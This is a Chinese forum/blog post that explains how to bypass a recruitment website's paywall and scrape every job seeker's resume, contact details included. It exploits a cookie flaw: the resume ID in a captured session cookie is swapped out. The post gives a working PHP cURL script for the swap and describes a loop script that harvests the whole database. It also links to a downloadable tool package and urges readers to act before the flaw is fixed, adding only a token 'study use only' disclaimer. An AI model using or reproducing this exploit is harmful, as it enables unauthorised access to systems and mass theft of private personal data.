推扬网

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
推扬网 门户 经验分享 查看内容

如何免费采集人才网的简历信息

2020-4-17 07:55| 发布者: admin| 查看: 509| 评论: 0

网上招聘行业的主要产品是资讯,利润的主要来源是需要招聘人才的企业消费者,供应商是需要找工作的求职者。大容量的简历库是人才网竟争企业客户的资本,也是人才网站不可缺少的资源。运营多年的人才网站,经过多年的运营推广,拥有丰富的人才资源,占据着市场主导地位。所以一个成功的人才网站,必须拥有大量的简历数据跟企业职位信息,才能吸引到企业客户及人才注册简历,形成一个好的良性循环。

由于人才网站的主要客户是企业,为企业做好宣传服务,所以人才网的企业信息可以轻易采集。但人才网的简历信息是收费才能查看的内容,简历的基本信息如:能力,工作经验,学历等,企业用户也可以免费查看,但主要的联系信息,就必须付费才能查看。一般的采集软件只能采集到部分简历信息,并不能有效地采集到完整的简历信息。某些能免费查看简历信息的人才网站,一般都是比较小型的人才网站,营利点不在人才相关服务方面,所以简历资料比较少,就算可以采集也没多大用途。

通过本文所说的方法,利用网站的Cookie漏洞,使用一定的技巧,跳过人才网的收费程序,免费查看到任意简历信息(包括简历详细联系方式)。而且采集的对象很多都是比较大型的人才网,上面的人才信息一般都是几十万以上,可能是部分网站的程序员对服务器HTTP协议低层通信原理不熟悉,Cookie使用不当,才会引起这种漏洞。

现在我们就以 jobxxx.com(暂不公开网站,可参看程序包内的网址)为例,说明一下如何采集收费的简历信息。最后放上整套程序包,包含自动采集,数据分析转存到数据库,快速地采集到大量的简历数据库,为你的人才网站建立一个优秀的七位数字的简历数据库。

详细操作过程:

1、首先我们先注册一个个人帐号,随便填就可以了,这个不重要。

2、然后在个人求职管理中心里面,我们打开简历预览页面,把这个当前页面的地址(URL)复制出来。http://www.jobxxx.com/Common.shtml?url=PersonResumeLoad

3、截取Cookie字串:

运行

这个软件,就可以为我们截取Cookie字串等信息。运行WSockExpert,打开选择IE进程,然后在IE浏览器里刷新一下页面,就可以在WSockExpert里看到IE与网站的通信数据内容,找到Cookie:这一行后,把Cookie:后面的的字符串复制出来,以备后用。下图红色圈圈部分就是简历ID号位置了。

4、写个一PHP(view.php)页面,程序代码如下:

File:view.php

error_reporting(E_ALL & ~E_NOTICE);

$referer = "http://www.jobxxx.com/Common.shtml?url=PersonResumeLoad&seeFlag=1";

$url = "http://www.jobxxx.com/Common.shtml?url=PersonResumeLoad";

$cookie = "JSESSIONID=6; person_username=asdfasdf; person_balnklist; person=id%3D{$_GET['id']}%7Epass%3D2%7Elogindate%3D2008-3-16+06%3A53%7Euseraccounts%3Demkcuf%7Euserpassword%3Demkcuf%7Eresumetype%3D0%7Eopen%3D1%2C1%2C1%2C1%7Emenu%3D1%2C2%2C3%2C4%7E";

$curl=curl_init();

curl_setopt($curl,CURLOPT_HEADER,1);

curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);

curl_setopt($curl,CURLOPT_REFERER,$referer);

curl_setopt($curl,CURLOPT_URL,$url);

if(isset($useproxy) && !empty($proxy))

curl_setopt($curl,CURLOPT_PROXY,"$proxy");

curl_setopt($curl,CURLOPT_COOKIE,$cookie);

$content=curl_exec($curl);

echo $content;

?>

免费查看简历的重点部分就是在$cookie串里面的{$_GET['id']}这个位置,这里是人才网站个人会员登陆后的简历ID保存位置,只要修改了这个ID值,就可让网站系统误以为是这个ID对应的简历是属于当前登陆帐号的,你就可以不需要知道另的简历登陆帐号,而可以查看任意简历信息了。

把这个页面放到WEB服务器或虚拟主机上面,通过访问 http://nulung.com/view.php?id=12345 这个页面的网址,其中12345表是简历ID(可以是任意简历的ID),该程序就可以帮你修改Cookie里的ID值为12345,实现免费查看这个ID为12345简历信息了,同样道理,修改其它ID值,就可以查看其它简历信息罗。

以上方法测试成功后,刚才你用WsockExpert看到的Cookie字串里的ID值,暂时就是这个人才网站的最大简历ID值,我们就可以通过写个循环程序(get_person.php),从大到少,读取这个网站的所有的简历数据,并保存到HTML页面,然后通过分析HTML页面的字段,把相关简历信息转换进数据库里面,就可以应用到你的人才网上面,丰富人才网的简历资源。当然了,要是用VC++写一个多线程的程序来采集,就可以更快的完成任务。因为PHP是单线程的,但PHP调试跟代码编写都简单,比较容易明白理解;你也可以多开几个窗口来加快采集的速度。

5、简历的更新,你可能认为,采集了这些简历信息,一段时间后就会失效了,没多大用途,需要能随时更新的才可以。所以,豁出去了,把更新方案都帮你想好了,第一次把所有简历都采集下来后,保存到一个数据库里,别把简历的ID修改了,只需要到这个人才网上面申请一个正式的企业帐号(花一点钱),以后就可以通过企业功能,查看简历的信息(但不包括联系方式),这样查看是不需要扣钱或限额的,然后对应ID号,把原来采集的简历信息,除联系方式部分,重新更新一下就可以了。一般简历的可能会更新的部分就是工作经验或求职意向这一小部分内容,其它内容是很少改变的——有哪几个人没事天天换电话号码跟Email地址的?对吧!

相关程序说明:

view.php 用于测试免费查看简历功能

get_person.php 通过循环读取网站的简历信息,并整页保存到当前目录下,需要打开这个文件,修改一下 $maxid = xxx;这一行,xxx可以填写上面所说的Cookie字串里的新注册的帐号对应的简历ID号。也可以通过命令行参数:

c:\>php get_person.php 12345

这种方式指定最大ID值

get_info.php 将get_person.php获得的简历页面,分析出数据库字段,并保存到数据库里

database.sql save2sql.php要保存的数据库记录表结构,有三个表

[person] 保存简历基本信息,联系方法等

[school] 保存简历的学历信息

[work] 保存简历的工作经验信息

global.php 数据库连接接口,及基本函数库。使用时,需要修改一下你的数据服务器帐号及数据库字,打开文件后顶部有注释。

以上所有程序,已打包上传到“搜珍网 http://www.dssz.com”上面,通过这个网址就可以访问下载了。http://www.dssz.com/21841_mian-fei-cai-ji-ren-cai-wang-jian-li-xin-xi-yuan-cheng-xu-dai-ma-bao.html

本文所说方法,只能用于学习研究用途,请匆用于非法目的。否则后果自负了。由于互联网的信息传播快,相信本文被采集的人才网站看到后,这个方法用不长了,所以要尽快动手哦,呵呵。


鲜花

握手

雷人

路过

鸡蛋

最新评论

精选推荐

    广告服务|投稿要求|禁言标准|版权说明|免责声明|手机版|小黑屋|推扬网 ( 粤ICP备18134897号 )|网站地图 | 邮箱:vayae@hotmail.com

    GMT+8, 2024-3-29 22:13 , Processed in 0.065560 second(s), 29 queries .

    Powered by Discuz! X3.4

    © 2001-2017 Comsenz Inc.

    返回顶部